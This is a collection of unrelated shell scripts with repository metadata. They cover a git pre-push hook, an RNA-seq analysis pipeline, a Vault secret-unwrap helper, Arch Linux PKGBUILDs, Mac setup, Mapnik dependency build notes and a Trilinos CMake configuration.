stack runhaskell --stack-yaml stack-exact.yaml --resolver "$r" --package extra --package optparse-applicative CI.hs -- --ghc-flavor "$f" --stack-yaml stack-exact.yaml --resolver "$r" --no-checkout
done
done
| true
|
f31fdd86273cdcee74885bf610e78da7616b5b72
|
Shell
|
danieldbower/githooks
|
/hooks/pre-push
|
UTF-8
| 675
| 3.40625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Prevents pushing to master or development branches
# ideas and some code from comments to https://gist.github.com/pixelhandler/5718585
BRANCH=`git rev-parse --abbrev-ref HEAD`
PUSH_COMMAND=`ps -ocommand= -p $PPID`
PROTECTED_BRANCHES="^(master|development)"
RED='\033[0;31m'
NC='\033[0m' # No Color
if [[ "$BRANCH" =~ $PROTECTED_BRANCHES ]]; then
echo
echo -e "${RED}Prevented push to protected branch \"$BRANCH\" by using a pre-push hook.${NC}"
echo "You should submit a pull request on Github instead."
echo
echo "If you want to skip this check, invoke again with --no-verify "
echo
exit 1
fi
exit 0
| true
|
d217e5ab4a9fd2fc4b8a06bd10d3a0707ced8512
|
Shell
|
Miranda-Reich/MirandaReich-repo
|
/supplemental_code_original.sh
|
UTF-8
| 11,687
| 3.34375
| 3
|
[] |
no_license
|
#Supplemental code
#1. Fastqc quality assesment code
#!/bin/sh
source /opt/asn/etc/asn-bash-profiles-special/modules.sh
module load fastqc/0.10.1
module load gnu_parallel/201612222
########### This is example code to move your files from our class shared to scratch, unzip them, concatenated the R1 and R2 files for each individual, and run fastqc the concatenated files
## Recommended submission to ASC:
# 10 cores
# 2 hours
# 20gb
###### remove any the targeted scratch directory and any files within
rm -r /scratch/aubcls06/DaphniaPunk
mkdir /scratch/aubcls06/DaphniaPunk
### Change directory to the scratch directory
cd /scratch/aubcls06/DaphniaPunk
##### copy all .fastq.gz to scratch directory in parallel using GNU parallel
# ls = make a (memory) list of the .fastq.gz files in that directory
# | in parallel using as many cores as possible (one job on each core) but no more jobs, cp the file in the list
# options: -- eta give the estimate time --dry-run to see if being parsed correctly
# You can do this seperately for the files you need to run using this code from before changing the specific file names
ls /home/aubcls06/class_shared/Exp1_DaphniaDataset/*.fastq.gz | time parallel -j+0 --eta 'cp {} .'
# unzip in parallel. List all the * .gz files and run on as many jobs as cores (-j) as and don't add any more files (0)
ls *fastq.gz |time parallel -j+0 'gunzip {}'
#### Create list of names:
# ls (list) contents of directory with fastq files, cut the names of the files at
#underscore characters and keep the first three chunks (i.e. fields; -f 1,2,3),
#sort names and keep only the unique ones (there will be duplicates of all
#file base names because of PE reads), then send the last 6 lines to a file
#called list with tail
# 1 = C3
# 2 = CCAGTT
# 3 = L00
# 4 = R1
# 5 = 001
#### Make the list then use that list to Concatenate Forward Read (R1)files in parallel (Thanks Steven Sephic for this solution!)
ls | grep ".fastq" |cut -d "_" -f 1,2 | sort | uniq | parallel cat {1}_L00*_R1_*.fastq '>' {1}_All_R1.fastq ::: ${i}
##### Concatenate Reverse Reads (R2) files
ls | grep ".fastq" |cut -d "_" -f 1,2 | sort | uniq | parallel cat {1}_L00*_R2_*.fastq '>' {1}_All_R2.fastq ::: ${i}
## Run fastqc on the All files in parallel
ls *_All_R1.fastq | time parallel -j+0 --eta 'fastqc {}'
ls *_All_R2.fastq | time parallel -j+0 --eta 'fastqc {}'
##Copy zipped files into my directory
cp *fastq.zip /home/aubcls06/class_shared/miranda_reich/Daphnia_data
#2. Trimming with Trimmomatic code
#!/bin/sh
source /opt/asn/etc/asn-bash-profiles-special/modules.sh
module load fastqc/0.10.1
module load trimmomatic/0.35
module load gnu_parallel/201612222
## Recommended submission:
# 10 cores
# 2 hours
# 20gb
### Change directory to the scratch directory
cd /scratch/aubcls06/DaphniaPunk
################## Now for the Cleaning ################################
# copy over the fasta file with the adapter file to use for screening
cp /home/aubcls06/class_shared/code/AdaptersToTrim_All.fa .
#### Create list of names:
# ls (list) contents of directory with fastq files, cut the names of the files at
#underscore characters and keep the first three chunks (i.e. fields; -f 1,2,3),
#sort names and keep only the unique ones (there will be duplicates of all
#file base names because of PE reads), then send the last 6 lines to a file
#called list with tail
# HS03_TTAGGC_L005_R1_001.fastq.gz
# 1 = C2
# 2 = CCAGTT
# 3 = All
# 4 = R1
# 5 = 001
ls | grep ".fastq" |cut -d "_" -f 1,2 | sort | uniq > list
### while loop to process through the names in the list
while read i
do
############ Trimmomatic #############
############ Trim read for quality when quality drops below Q30 and remove sequences shorter than 36 bp
#MINLEN:<length> #length: Specifies the minimum length of reads to be kept.
#SLIDINGWINDOW:<windowSize>:<requiredQuality> #windowSize: specifies the number of bases to average across
#requiredQuality: specifies the average quality required.
# -threads is the option to define the number of threads (cores) to use. For this to be effective you need to request those cores at submission
# ON HOPPER: trimmomatic-0.36
java -jar /opt/asn/apps/trimmomatic_0.35/Trimmomatic-0.35/trimmomatic-0.35.jar PE -threads 10 -phred33 "$i"_All_R1.fastq "$i"_All_R2.fastq "$i"_All_R1_paired_threads.fastq "$i"_All_R1_unpaired_threads.fastq "$i"_All_R2_paired_threads.fastq "$i"_All_R2_unpaired_threads.fastq ILLUMINACLIP:AdaptersToTrim_All.fa:2:30:10 HEADCROP:10 LEADING:30 TRAILING:30 SLIDINGWINDOW:6:30 MINLEN:36
done<list
############### Now assess Quality again
#fastqc on the cleaned paired fastq files in parallel
ls *_R1_paired_threads.fastq | parallel -j+0 --eta 'fastqc {}'
ls *_R2_paired_threads.fastq | parallel -j+0 --eta 'fastqc {}'
##Copy zipped files into my directory
cp *_paired_threads_fastqc.zip /home/aubcls06/class_shared/miranda_reich/Daphnia_data
#3. Mapping and conversion from sam to bam using HiSat and Samtools
#!/bin/sh
#load modules
module load hisat2/2.0.5
module load samtools/1.3.1
module load gnu_parallel/201612222
### Change directory to the scratch directory
cd /scratch/aubcls06/Daphniapunk2
#Only way I could get this to run is when the index files are copied to DaphniaPunk scratch directory by hand.
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.1.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.2.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.3.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.4.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.5.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.6.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.7.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.8.ht2
#parallelize mapping
ls | grep "paired_threads.fastq" |cut -d "_" -f 1,2 | sort | uniq | time parallel -j+0 --eta hisat2 -p 10 --dta -x Daphnia_pulex_INDEX3 -1 {1}_All_R1_paired_threads.fastq {1}_All_R2_paired_threads.fastq -S {1}.sam ::: ${i}
while read i
do
samtools sort -@ 10 -o "$i".bam "$i".sam
done < list
#4. Assemble and merge transcripts together using StringTie
#!/bin/sh
#load modules
module load stringtie/1.3.3
module load gnu_parallel/201612222
#move into directory
cd /scratch/aubcls06/DaphniaPunk/
#copy over annotation file daphnia_genes2010_beta3.gtf before running script!!
#cp /home/aubcls06/class_shared/DaphniaPunk/daphnia_genes2010_beta3.gtf .
#Assemble transcripts for each sample
ls | grep ".bam" | cut -d "_" -f 1 | sort | uniq | time parallel -j+0 --eta stringtie -p 10 -G daphnia_genes2010_beta3.gtf -o {1}assembled.gtf -l {1} {1}*.bam ::: ${i}
#Get mergelist of assembled transcripts, letter 'a' added to transcript filename to allow grab of .gtf files ignoring index
ls *assembled.gtf | sort | uniq > mergelist.txt
#Merge transcripts from all samples
stringtie --merge -p 10 -G daphnia_genes2010_beta3.gtf -o stringtie_merged.gtf mergelist.txt
#Make appropriate directory heirarchy for ballgown
mkdir ballgown
#Estimate transcript abundances and create table counts for Ballgown
ls | grep ".bam" | cut -d "_" -f 1 | sort | uniq | time parallel -j+0 --eta stringtie -p 10 -G stringtie_merged.gtf -o ballgown/daph{1}/daph{1}.gtf -B -e {1}*.bam ::: ${i}
#Make tarball to bring over to R
tar -cvzf ballgown.tgz ballgown
cp *tgz /home/class_shared/aubcls06/miranda_reich/Daphnia_data
#5. Analysis differential gene expression using Ballgown in R
####Ballgown Differential Expression Analysis Basline####
#Code compiled from Pertea et. al 2016 Transcript-level expression analysis of RNA-seq experiments with HISAT, StringTie, and Ballgown
#Load relevant R packages, downloaded previously
#Ballgown and genefilter DL from bioconductor, RSkittleBrewer from AlyssaFreeze github, and Devtools and dplyr installed using install.packages
library(ballgown)
library(RSkittleBrewer)
library(genefilter)
library(dplyr)
library(devtools)
#Import the metadata summarizing the samples and treatments (must create this separately in a text editor;similar to colData file in garter snake practice)
pheno_data = read.csv("phenodata_Dp.csv")
#Import the countdata table made using the merge script.
# dataDir = the parent directory holding you StringTie output subdirectories/files
#samplePattern = pattern for ballgown to find in all your sample subdirectories
#daphnia_countdata = ballgown(dataDir = "CHANGEME", samplePattern = "CHANGEME", pData =pheno_data)
daphnia_countdata = ballgown(dataDir = "original_data", samplePattern = "daph", pData =pheno_data)
####Display data in tabular format####
#Filter low abundance genes out
daphnia_countdata_filt = subset(daphnia_countdata, "rowVars(texpr(daphnia_countdata)) >1", genomesubset=TRUE)
#Identify transcripts that show sig difs between groups
results_transcripts = stattest(daphnia_countdata_filt, feature="transcript", covariate = "treatment", getFC = TRUE, meas="FPKM")
#Identify genes that show statistically sig diffs between groups
results_genes = stattest(daphnia_countdata_filt, feature="gene", covariate = "treatment", getFC = TRUE, meas="FPKM")
#Add gene names and gene IDs to the results_trascripts data frame
results_transcripts = data.frame(geneNames=ballgown::geneNames(daphnia_countdata_filt), geneIDs=ballgown::geneIDs(daphnia_countdata_filt), results_transcripts)
#Sort the results from smallest P value to the largest
results_transcripts = arrange(results_transcripts,pval)
results_genes = arrange(results_genes,pval)
#Write results to a csv file that can be shared and distributed
write.csv(results_transcripts, "daphnia_transcript_results.csv", row.names = FALSE)
write.csv(results_genes, "daphnia_genes_results.csv", row.names = FALSE)
#Identify transcripts and genes with a q value <0.05
sig.transcripts <- subset(results_transcripts,results_transcripts$qval<0.05)
sig.genes <- subset(results_genes,results_genes$qval<0.05)
####Display data in visual format####
#Make pretty plot colors
tropical = c('darkorange', 'dodgerblue', 'hotpink', 'limegreen', 'yellow')
palette(tropical)
#Show the distribution of gene abundances (measured as FPKM with ballgown) across samples, colored by treatment
fpkm = texpr(daphnia_countdata,meas="FPKM")
fpkm = log2(fpkm+1)
boxplot(fpkm,col=as.numeric(pheno_data$treatment),las=2,ylab='log2(FPKM+1)')
#Plotting individual trascripts if you have one you want to target
ballgown::transcriptNames(daphnia_countdata)[12]
## 12
## "GTPBP6"
ballgown::geneNames(daphnia_countdata)[12]
## 12
## "GTPBP6
plot(fpkm[12,] ~ pheno_data$treatment, border=c(1,2),main=paste(ballgown::geneNames(daphnia_countdata)[12],' : ',ballgown::transcriptNames(daphnia_countdata)[12]),pch=19,xlab="Treatments",ylab='log2(FPKM+1)')
points(fpkm[12,] ~ jitter(as.numeric(pheno_data$treatment)),col=as.numeric(pheno_data$treatment))
#Plot structure and expression levels in a sample of all transcripts that share the same gene locus
plotTranscripts(ballgown::geneIDs(daphnia_countdata)[4.1], daphnia_countdata, main=c('Gene XIST in sample daphC3_CCGAAG'), sample=c('daphC3_CCGAAG'))
#Plot the average expression levels for all transcripts of a gene within different groups using the plotMeans function. Need to specify which gene to plot
plotMeans('MSTRG.7789', daphnia_countdata_filt, groupvar = "treatment",legend=FALSE)
| true
|
2287bd9ae43efeb598b49ca08ed882e6bb06db8f
|
Shell
|
jamesgua/tls_conn_test
|
/node/jsongen.sh
|
UTF-8
| 595
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
if [ $# -ne 1 ]; then
echo "must provide wrapped secret_id!"
echo "usage: $0 \$wrapped_secret_id"
exit 1
fi
jsonfile=$HOME/.appRoleIDs.json
touch $jsonfile
if [ $? -ne 0 ]; then
echo "No write permission, failed to generate json file"
exit 1
fi
export role_id="$role_id"
curl -H "X-Vault-Token: $1" -X POST $VAULT_ADDR/v1/sys/wrapping/unwrap > $jsonfile
export secret_id=$( jq -r ".data.secret_id" $jsonfile )
echo "{" | cat > $jsonfile
echo "\"role_id\":\"$role_id\"," | cat >> $jsonfile
echo "\"secret_id\":\"$secret_id\"" | cat >> $jsonfile
echo "}" | cat >> $jsonfile
| true
|
b7fe5b9ce251f539a4fc3f9fddba76db7d39698d
|
Shell
|
petronny/aur3-mirror
|
/monster-rpg2-lite/PKGBUILD
|
UTF-8
| 1,429
| 2.78125
| 3
|
[] |
no_license
|
# This is an example PKGBUILD file. Use this as a start to creating your own,
# and remove these comments. For more information, see 'man PKGBUILD'.
# NOTE: Please fill out the license field for your package! If it is unknown,
# then please put 'unknown'.
# Maintainer: René Reigel <stormtrooperofdeath@gmx.net>
pkgname=monster-rpg2-lite
pkgver=1.1
pkgrel=1
epoch=
pkgdesc="The Monster series of RPGs are high quality role-playing games. They are built from scratch with a focus on good story, unique gameplay features, and professional looking and sounding artwork and audio."
arch=('i686' 'x86_64')
url="http://www.nooskewl.com"
license=('commercial')
groups=()
depends=('libgl' 'libxinerama' 'libxxf86vm' 'libxfixes')
makedepends=()
checkdepends=()
optdepends=()
provides=()
conflicts=()
replaces=()
backup=()
options=()
install=
changelog=
source=(http://www.nooskewl.com/stuff/downloads/MonsterRPG2-lite-1.1.tar.bz2 'monster2')
noextract=()
md5sums=('e4bda2b736e884ac086a45a63a465723' 'b211e8eef420ab461871786115cb8fb3')
#generate with 'makepkg -g'
build() {
cd "$srcdir/MonsterRPG2-lite-$pkgver"
if [ "$CARCH" == "i686" ]; then
mv 32bit/* ./
fi
}
package() {
cd "$srcdir/MonsterRPG2-lite-$pkgver"
mkdir -p $pkgdir/usr/bin
install -m755 ../monster2 $pkgdir/usr/bin/
install -d -m755 $pkgdir/opt/$pkgname/
cp -av data libbassflac.so libbass.so LICENSE.txt monster2 README.txt $pkgdir/opt/$pkgname/
}
# vim:set ts=2 sw=2 et:
| true
|
e9f9c7c12e0cd498418026770f847dab658d20c7
|
Shell
|
timm/16
|
/rowporter
|
UTF-8
| 1,762
| 3.953125
| 4
|
[
"Unlicense"
] |
permissive
|
#!/usr/bin/env bash
# rowporter :simple text report generator from tab-seperated tables
# (c) Tim Menzies, BSD license (2 paragraph version), 2016
# Requires: bash, awk, fmt, tr
# Tested on linux and mac. As to windows: let me know how that goes.
# Tested using Google sheets, has problems with Excel. Anyone?
# Usage:
# [1] Write a spreadsheet where line1 are some headers
# [2] Name it something; e.g. myreport1
# [3] Do not use tabs in the spreadsheet.
# [4] The right-hand side column header should be 'Notes'
# (case does not matter). Repsheet ignores all columns
# after this column.
# [5] Write one report per row, under the headers. If a cell
# needs a long comment, add it as e.g. [1] in the notes
# column.
# [6] Save the sheet, tab-seperated format. Excel will generate
# XXX.txt and Google Sheets will generate 'XXX.tsv'. Remember
# that magic extension.
# [7] Execute
#
# bash rowporter 'XXX*YYY'
#
# where XXX is the report name (e.g. myreport1)
# and YYY is the magic extension (e.g. tsv).
# [8] Look for the file XXX*YYY.out. Paste text from there into
# emails. Report done!
set -x
F=${1:-'fss16ess*tsv'}
Width=${2:-60}
cat "$F" |
awk 'BEGIN { FS="\t"; IGNORECASE = 1}
NR==1 { notes = NF
for(i=1;i<=NF;i++) {
if ( $i ~ /notes/ )
notes = i
head[i]=$i;
}; next}
NR > 1 {
gsub(/\[[0-9]/,"\n\n &",$notes)
gsub(/\^\* /,"\n\n &",$notes)
print("\n____________________________")
for(i=1;i<=notes;i++) {
txt = $i ~/^[ \t]*$/ ? "Y" : $i
print "\n" head[i],": " txt
}; next}
' |
fmt -$Width > "$F.out"
less "$F.out"
| true
|
5c43dbcce91c365920dabd264f4880cbb1573ed1
|
Shell
|
xkwangy/mapnik-packaging
|
/mapnik-lto.sh
|
UTF-8
| 8,599
| 2.609375
| 3
|
[] |
no_license
|
sudo apt-get install linux-headers-server linux-image-server linux-server
sudo mkdir /opt/
sudo chown mapnik -R /opt/
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install binutils-gold subversion build-essential gcc-multilib
mkdir -p $HOME/deb
cd $HOME/deb
apt-get source binutils
cd ~/src
# http://llvm.org/docs/GoldPlugin.html
sudo apt-get install cvs texinfo bison flex
cvs -z 9 -d :pserver:anoncvs@sourceware.org:/cvs/src login
{enter "anoncvs" as the password}
cvs -z 9 -d :pserver:anoncvs@sourceware.org:/cvs/src co binutils
mv src/ binutils
cd binutils
export CFLAGS="-O2 -I$PREFIX/include"
export CXXFLAGS="-O2 -I$PREFIX/include"
export LDFLAGS="-O2 -L$PREFIX/lib"
export CC="gcc"
export CXX="g++"
export AR=ar
export NM=nm
vim binutils/ar.c
# grep for bfd_plugin_set_plugin
# change:
bfd_plugin_set_plugin (optarg);
# to:
bfd_plugin_set_plugin ("/opt/llvm/lib/LLVMgold.so");
./configure --prefix=/opt/binutils --enable-gold --enable-plugins
make
make install
mv /opt/binutils/bin/ld /opt/binutils/bin/ld-old
cp /opt/binutils/bin/ld.gold /opt/binutils/bin/ld
#cp gold/ld-new /opt/binutils/x86_64-unknown-linux-gnu/bin/ld
#mv /opt/binutils/bin/nm /opt/binutils/bin/nm-old
#cp binutils/nm-new /opt/binutils/x86_64-unknown-linux-gnu/bin/nm
svn co http://llvm.org/svn/llvm-project/llvm/trunk llvm
cd llvm/tools
svn co http://llvm.org/svn/llvm-project/cfe/trunk clang
cd ..
./configure \
--prefix=/opt/llvm \
--enable-optimized \
--with-binutils-include=$HOME/src/binutils/include
make
sudo make install
PREFIX=$HOME/projects/mapnik-static-build/sources
export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig
export PATH=$PREFIX/bin:/opt/llvm/bin:/opt/binutils/bin:$PATH
export CFLAGS="-O4 -I$PREFIX/include -fPIC"
export CXXFLAGS="-O4 -I$PREFIX/include -fPIC"
export LDFLAGS="-O4 -L$PREFIX/lib"
export CC="clang -use-gold-plugin"
export CXX="clang++ -use-gold-plugin"
export LD_LIBRARY_PATH=/opt/mapnik/lib:/opt/llvm/lib:/opt/binutils/lib:$PREFIX/lib:$LD_LIBRARY_PATH
# we patch ar to send --plugins option in all cases
# so this line is commented since it will not work anyway
#export AR="ar -rc --plugin /opt/llvm/lib/LLVMgold.so"
export NM="nm --plugin /opt/llvm/lib/LLVMgold.so"
export RANLIB=/bin/true
mkdir -p $PREFIX
cd $PREFIX/../
mkdir -p deps
# make sure this works: https://gist.github.com/1283119
cd $PREFIX/../deps
# sqlite
wget http://www.sqlite.org/sqlite-autoconf-3070800.tar.gz
tar xvf sqlite-autoconf-3070800.tar.gz
cd sqlite-autoconf-3070800
export CFLAGS="-DSQLITE_ENABLE_RTREE=1 "$CFLAGS
./configure --prefix=$PREFIX --enable-static --disable-shared
make -j6
make install
cd ../
# freetype
wget http://download.savannah.gnu.org/releases/freetype/freetype-2.4.6.tar.bz2
tar xvf ../deps/freetype-2.4.6.tar.bz2
cd freetype-2.4.6
./configure --prefix=$PREFIX \
--enable-static \
--disable-shared
make -j6
make install
# proj4
wget http://download.osgeo.org/proj/proj-datumgrid-1.5.zip
# we use trunk instead for better threading support
svn co http://svn.osgeo.org/metacrs/proj/trunk/proj proj-trunk # at the time pre-release 4.8.0
cd proj-trunk/nad
unzip ../../proj-datumgrid-1.5.zip # answer [y] yo overwrite
cd ../
./configure --prefix=$PREFIX \
--no-mutex \
--enable-static \
--disable-shared
make -j6
make install
cd ../
# zlib
wget http://zlib.net/zlib-1.2.5.tar.gz
tar xvf zlib-1.2.5.tar.gz
cd zlib-1.2.5
./configure --prefix=$PREFIX --static --64
make -j6
make install -i -k
# libpng
wget ftp://ftp.simplesystems.org/pub/libpng/png/src/libpng-1.5.5.tar.gz
tar xvf libpng-1.5.5.tar.gz
cd libpng-1.5.5
./configure --prefix=$PREFIX --with-zlib-prefix=`pwd`/../../sources/ --enable-static --disable-shared
make -j6
make install
cd ../
# libjpeg
wget http://www.ijg.org/files/jpegsrc.v8c.tar.gz
tar xvf jpegsrc.v8c.tar.gz
cd jpeg-8c
./configure --prefix=$PREFIX --enable-static --disable-shared
make -j6
make install
cd ../
# libtiff
wget http://download.osgeo.org/libtiff/tiff-3.9.5.tar.gz
tar xvf tiff-3.9.5.tar.gz
cd tiff-3.9.5
./configure --prefix=$PREFIX --enable-static --disable-shared
make -j6
make install
cd ../
wget http://download.icu-project.org/files/icu4c/4.8.1/icu4c-4_8_1-src.tgz
tar xvf icu4c-4_8_1-src.tgz
cd icu/source
./configure Linux --prefix=$PREFIX \
--with-library-bits=64 --enable-release \
make -j6
make install
cd ../../
sudo apt-get install python-dev
wget http://voxel.dl.sourceforge.net/project/boost/boost/1.47.0/boost_1_47_0.tar.bz2
tar xjvf boost_1_47_0.tar.bz2
cd boost_1_47_0
./bootstrap.sh
echo 'using clang ;' > ~/user-config.jam
./bjam -d2 \
linkflags="$LDFLAGS" \
cxxflags="$CXXFLAGS" \
--prefix=$PREFIX --with-python \
--with-thread \
--with-filesystem \
--with-program_options --with-system --with-chrono \
--with-regex \
-sHAVE_ICU=1 -sICU_PATH=$PREFIX \
toolset=clang \
link=static \
variant=release \
stage -a
./bjam \
linkflags="$LDFLAGS" \
cxxflags="$CXXFLAGS" \
--prefix=$PREFIX --with-python \
--with-thread \
--with-filesystem \
--with-program_options --with-system --with-chrono \
--with-regex \
-sHAVE_ICU=1 -sICU_PATH=$PREFIX \
toolset=clang \
link=static \
variant=release \
install
# no icu variant
./bjam --disable-icu \
# gdal 1.8.1
wget http://download.osgeo.org/gdal/gdal-1.8.1.tar.gz
tar xvf gdal-1.8.1.tar.gz
cd gdal-1.8.1
# add libdl and pthreads so that configure check against static libsqlite3
# does not blow up on: "unixDlOpen: error: undefined reference to 'dlopen'"
# and "undefined reference to 'pthread_mutexattr_init'"
export LDFLAGS="-ldl -pthread $LDFLAGS"
# or --unresolved-symbols=ignore-all
./configure --prefix=$PREFIX --enable-static --disable-shared \
--with-libtiff=$PREFIX \
--with-jpeg=$PREFIX \
--with-png=$PREFIX \
--with-static-proj4=$PREFIX \
--with-sqlite3=$PREFIX \
--with-spatialite=no \
--with-curl=no \
--with-geos=no \
--with-pcraster=no \
--with-cfitsio=no \
--with-odbc=no \
--with-libkml=no \
--with-pcidsk=no \
--with-jasper=no \
--with-gif=no \
--with-pg=no \
--with-vfk=no \
--with-grib=no
# note: --with-hide-internal-symbols=yes will break during linking of ogr.input..
llvm-ld: error: Cannot link in module '/home/mapnik/projects/mapnik-static-build/sources/lib/libgdal.a(ogrfeature.o)': Linking globals named '_ZNSt6vectorIiSaIiEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPiS1_EERKi': symbols have different visibilities!
llvm-ld: error: Cannot link archive '/home/mapnik/projects/mapnik-static-build/sources/lib/libgdal.a'
GDAL is now configured for x86_64-unknown-linux-gnu
Installation directory: /home/mapnik/projects/mapnik-static-build/sources
C compiler: clang -use-gold-plugin -O4 -I/home/mapnik/projects/mapnik-static-build/sources/include -fPIC
C++ compiler: clang++ -use-gold-plugin -O4 -I/home/mapnik/projects/mapnik-static-build/sources/include -fPIC
LIBTOOL support: yes
LIBZ support: external
LIBLZMA support: no
GRASS support: no
CFITSIO support: no
PCRaster support: no
NetCDF support: no
LIBPNG support: external
LIBTIFF support: external (BigTIFF=no)
LIBGEOTIFF support: internal
LIBJPEG support: external
8/12 bit JPEG TIFF: no
LIBGIF support: no
OGDI support: no
HDF4 support: no
HDF5 support: no
Kakadu support: no
JasPer support: no
OpenJPEG support: no
ECW support: no
MrSID support: no
MrSID/MG4 Lidar support: no
MSG support: no
GRIB support: no
EPSILON support: no
cURL support (wms/wcs/...):no
PostgreSQL support: no
MySQL support: no
Ingres support: no
Xerces-C support: no
NAS support: no
Expat support: yes
Google libkml support: no
ODBC support: no
PGeo support: no
PCIDSK support: old
OCI support: no
GEORASTER support: no
SDE support: no
Rasdaman support: no
DODS support: no
SQLite support: yes
SpatiaLite support: no
DWGdirect support no
INFORMIX DataBlade support:no
GEOS support: no
VFK support: no
Poppler support: no
OpenCL support: no
SWIG Bindings: no
Statically link PROJ.4: yes
enable OGR building: yes
enable pthread support: yes
hide internal symbols: no
make -j6
make install
cd ../
| true
|
1e9f711913d918b2f824afcf7176280bb27d1000
|
Shell
|
bradleygolden/mac-restore
|
/mac_restore.sh
|
UTF-8
| 821
| 3.21875
| 3
|
[] |
no_license
|
#!bin/bash
# Check for Homebrew,
# Install if we don't have it
if test ! $(which brew); then
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
echo 'export PATH="/usr/local/bin:$PATH"' >> ~/.bash_profile
fi
# install brew binaries/cask applications/app store applications
brew bundle --file=homebrew/Brewfile
brew cleanup
# setup pyenv
echo 'eval "$(pyenv init -)"' >> ~/.zshenv
echo "installing python versions..."
pyenv install 2.7.13
pyenv install 3.6.0
pyenv global system 2.7.13 3.6.0 # set python version defaults
# install necessary system wide pip packages
python3 -m pip install -r pip/requirements.txt
# setup atom
echo "installing atom plugins..."
apm install --packages-file atom/package-list.txt
# Create development folder
mkdir ~/Development
| true
|
ce255d86c0991eef7fe2cfcc12327451dba9374b
|
Shell
|
nrgaway/qubes-core-vchan-kvm
|
/archlinux/PKGBUILD
|
UTF-8
| 1,405
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
# shellcheck disable=SC2034
# This is an example PKGBUILD file. Use this as a start to creating your own,
# and remove these comments. For more information, see 'man PKGBUILD'.
# NOTE: Please fill out the license field for your package! If it is unknown,
# then please put 'unknown'.
# Maintainer: Olivier Medoc <o_medoc@yahoo.fr>
pkgname=qubes-libvchan-xen
pkgver=`cat version`
pkgrel=2
epoch=
pkgdesc="The Qubes core libraries for installation inside a Qubes Dom0 and VM."
arch=("x86_64")
url="http://qubes-os.org/"
license=('GPL')
groups=()
depends=(qubes-vm-xen)
makedepends=(qubes-vm-xen)
checkdepends=()
optdepends=()
provides=('qubes-core-libs' 'qubes-libvchan')
conflicts=()
replaces=('')
backup=()
options=()
install=
changelog=
source=()
noextract=()
md5sums=() #generate with 'makepkg -g'
build() {
ln -s $srcdir/../vchan $srcdir/vchan
ln -s $srcdir/../u2mfn $srcdir/u2mfn
(cd u2mfn; make)
(cd vchan; make -f Makefile.linux)
}
package() {
install -D -m 0644 vchan/libvchan.h $pkgdir/usr/include/vchan-kvm/libvchan.h
install -D -m 0644 u2mfn/u2mfnlib.h $pkgdir/usr/include/u2mfnlib.h
install -D -m 0644 u2mfn/u2mfn-kernel.h $pkgdir/usr/include/u2mfn-kernel.h
install -D -m 0644 vchan/vchan-xen.pc $pkgdir/usr/lib/pkgconfig/vchan-kvm.pc
install -D vchan/libvchan-kvm.so $pkgdir/usr/lib/libvchan-kvm.so
install -D u2mfn/libu2mfn.so $pkgdir/usr/lib/libu2mfn.so
}
# vim:set ts=2 sw=2 et:
| true
|
dbcb5b149e6f111d3dcdc063a213a1be3d38f06a
|
Shell
|
bazaarvoice/cloudbreak
|
/orchestrator-salt/src/main/resources/salt/salt/ambari/scripts/install-mpack.sh
|
UTF-8
| 384
| 2.828125
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"ANTLR-PD",
"CDDL-1.0",
"bzip2-1.0.6",
"Zlib",
"BSD-3-Clause",
"MIT",
"EPL-1.0",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-jdbm-1.00",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -ex
ARGS=""
{% if mpack.purge %}
ARGS+="--purge"
{% endif %}
{% if mpack.force %}
ARGS+=" --force"
{% endif %}
{% if mpack.purgeList %}
ARGS+=" --purge-list {{ mpack.purgeList|join(',') }}"
{% endif %}
echo yes | ambari-server install-mpack --mpack={{ mpack.mpackUrl }} ${ARGS} --verbose
echo "$(date +%Y-%m-%d:%H:%M:%S) {{ mpack.mpackUrl }}" >> /var/mpack_installed
| true
|
1068dc28e2536dfe7d842a611af6ff0b9eac17b3
|
Shell
|
aprokop/package_configs
|
/trilinos_dtk
|
UTF-8
| 1,509
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
EXTRA_ARGS=$@
source $HOME/.personal/package_configs/preamble
TRILINOS_DIR="${TRILINOS_DIR:-$(pwd)/..}"
ARGS=(
-D CMAKE_BUILD_TYPE=RelWithDebInfo
-D CMAKE_INSTALL_PREFIX=$HOME/local/opt/trilinos-dtk/
-D BUILD_SHARED_LIBS=ON
### COMPILERS AND FLAGS ###
-D CMAKE_CXX_COMPILER_LAUNCHER=ccache
-D CMAKE_CXX_STANDARD=14
-D Trilinos_TPL_SYSTEM_INCLUDE_DIRS=ON
-D Trilinos_ENABLE_Fortran=OFF
### TPLS ###
-D TPL_ENABLE_MPI=ON
### ETI ###
-D Trilinos_ENABLE_EXPLICIT_INSTANTIATION=ON
# Serial
-D Kokkos_ENABLE_SERIAL=ON
-D Tpetra_INST_SERIAL=ON
# OpenMP
-D Trilinos_ENABLE_OpenMP=ON
-D Kokkos_ENABLE_OPENMP=ON
-D Tpetra_INST_OPENMP=ON
# CUDA
-D TPL_ENABLE_CUDA=ON
-D CMAKE_CXX_COMPILER="${TRILINOS_DIR}/packages/kokkos/bin/nvcc_wrapper"
-D Kokkos_ENABLE_CUDA=ON
-D Kokkos_ENABLE_CUDA_UVM=ON
-D Kokkos_ENABLE_CUDA_LAMBDA=ON
-D Kokkos_ARCH_PASCAL61=ON
### PACKAGES CONFIGURATION ###
-D Trilinos_ENABLE_ALL_PACKAGES=OFF
